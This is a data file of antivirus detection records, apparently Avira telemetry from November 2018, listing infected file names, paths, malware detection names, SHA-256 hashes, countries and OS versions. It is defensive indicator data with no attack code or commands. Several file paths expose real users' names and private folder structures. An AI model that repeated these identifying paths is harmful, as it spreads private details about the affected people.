  Row(detection=Row(filename='avscan-20181102-055157-60eedb95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055157-60EEDB95', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062029-5dc55128', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062029-5DC55128', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061953-47d5705f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061953-47D5705F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055316-90324ea3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055316-90324EA3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052405-7c8255d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052405-7C8255D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054925-063ad18f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054925-063AD18F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055054-3bcbc604', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055054-3BCBC604', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053258-b9ff0dba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053258-B9FF0DBA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061051-04dad210', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061051-04DAD210', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053546-1e51d1cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053546-1E51D1CD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062502-00265be4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062502-00265BE4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060141-bd1e6208', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060141-BD1E6208', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050807-4177d111', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050807-4177D111', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055448-c6f64fc1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055448-C6F64FC1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052616-ca62a3fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052616-CA62A3FD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054436-5a2cd2eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054436-5A2CD2EB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062124-7e38e147', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062124-7E38E147', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062217-9dcec5a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062217-9DCEC5A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053444-f97798d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053444-F97798D8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T08:38:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052650-df00e4ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052650-DF00E4CE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055407-aeca8ff5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055407-AECA8FF5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062217-9e16caee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062217-9E16CAEE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055450-c87b8681', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055450-C87B8681', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T22:01:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055730-278d27d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055730-278D27D7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062254-b4337b83', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062254-B4337B83', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rlistupdater', filepath='/Volumes/backup/Backups.backupdb/MacBook Pro de erly wilson/2017-09-12-235335/Erly W/Users/erlywilson/Library/Application Support/amc/helperamc.app/Contents/Resources/rlistupdater.app/Contents/MacOS/rlistupdater', filesize=204000, name='OSX/GT32SupportGeeks.owcbg.#M0.#R0'), hash='877421f09497bb504dde87c3107888c89f174b955dacb088873bf9754babe5f3', metadata=Row(cmdline=None, country='BR', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T00:51:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052402-7ae35b07', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052402-7AE35B07', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053821-7a915f5a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053821-7A915F5A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060147-c08cca20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060147-C08CCA20', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054446-602c45f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054446-602C45F2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060556-55622efe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060556-55622EFE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-185150-7b8c9c43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_385ad61b\\AVSCAN-20181101-185102-7404AC97\\AVSCAN-20181101-185150-7B8C9C43', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:52:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kebakaran 4.10.14.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PERSIAPAN AUDIT\\LAPORAN P2K3\\P2K3 OKTOBER 2014\\evakuasi kebakaran 4.10.14\\kebakaran 4.10.14.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nexustk.exe_25c88ee8d81e408c9fb88c09c1e79577.exe', filepath='C:\\Windows\\Installer\\{4D6DE8B6-B0A0-4F2C-BEBE-1FA024E7B951}\\NexusTK.exe_25C88EE8D81E408C9FB88C09C1E79577.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='47bca412c73d6068cf5373d9c2447a99619a7da7c632c9270b9a050af6595930', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T01:23:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sharing.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\sharing.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='399413336734193.exe', filepath='\\\\?\\C:\\Temp\\399413336734193.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:18:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rhzkhe5', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RHZKHE5', filesize=64000, name='W97M/Agent.8759332.#M1.#R1'), hash='3d7c83e4bfd3c9b1c7ddf83c90b210e4259c466522bda4bf95212908aabc3b7b', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:16:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='laporan audit.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA LAPORAN AUDIT\\LAPORAN AUDIT.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1.exe', filepath='\\?\\J:\\العاب2\\العاااااااااب خفيفة\\1.EXE', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='525750fc798f61991865ba09116f4c41411a3f1915beaa989ee698b89c33738b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:10:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='riched32.dll', filepath='\\\\?\\C:\\Windows\\SysWOW64\\MUI\\S-1-5-86\\Riched32.dll', filesize=256000, name='TR/AD.CoinLoader.B.#M1.#R1'), hash='4af82a3625f018fb014888948f76a681bbfe1b2bb6624b2002f06142f0712333', metadata=Row(cmdline=None, country='UZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:01:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='15d48ced869114d974cd56c0999a6cf81b73fcf3e3806558be64d94187d42536', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\15D48CED869114D974CD56C0999A6CF81B73FCF3E3806558BE64D94187D42536', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='15d48ced869114d974cd56c0999a6cf81b73fcf3e3806558be64d94187d42536', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:23:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='\\\\?\\F:\\Autocad2008\\x64\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='233646a02fd077be29f9ae0e6674fc2a0071da1a19aa29d7b08305eeda231295', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:17:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='folder settings .exe', filepath='\\?\\J:\\العاب\\AirXonix1\\Folder Settings\\Folder Settings .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='3bc9497f91f9f797fbcd5cbcea1d89ecc1388ad844c801ad5043b87f26e51950', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-200103-bea2e667', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c5ba033c\\AVSCAN-20181101-200044-BADB5AAE\\AVSCAN-20181101-200103-BEA2E667', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:01:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-28T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpavgio.dll\\\\\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', parentsize=840000, timestamp='2018-11-01T06:50:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='limbah.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\DINI\\RPG\\PERATURAN LIMBAH\\LIMBAH.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:26:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='186c0d95ae9524e96da6e0f987e945d1207ff4df0a1a1fbe45e7f0b453f9fdac', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\186C0D95AE9524E96DA6E0F987E945D1207FF4DF0A1A1FBE45E7F0B453F9FDAC', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='186c0d95ae9524e96da6e0f987e945d1207ff4df0a1a1fbe45e7f0b453f9fdac', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:13:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=240000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='1bf03d89944562171b570d2361296d3a0fb700614c1f80c1aef5e2386162e255', metadata=Row(cmdline=None, country='AF', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T17:21:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a33a8bb73942529478ab22067aabc685f1cd8fc4', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2\\a33a8bb73942529478ab22067aabc685f1cd8fc4', filesize=1536000, name='W32/Virut.Gen.#M1.#R1'), hash='53964810fdd4b45aa96ed43ddd1d69ec6c93837a34ba6e21520d36a67bad86c6', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:48:54Z'), dt=datetime.date(2018, 11, 1)),
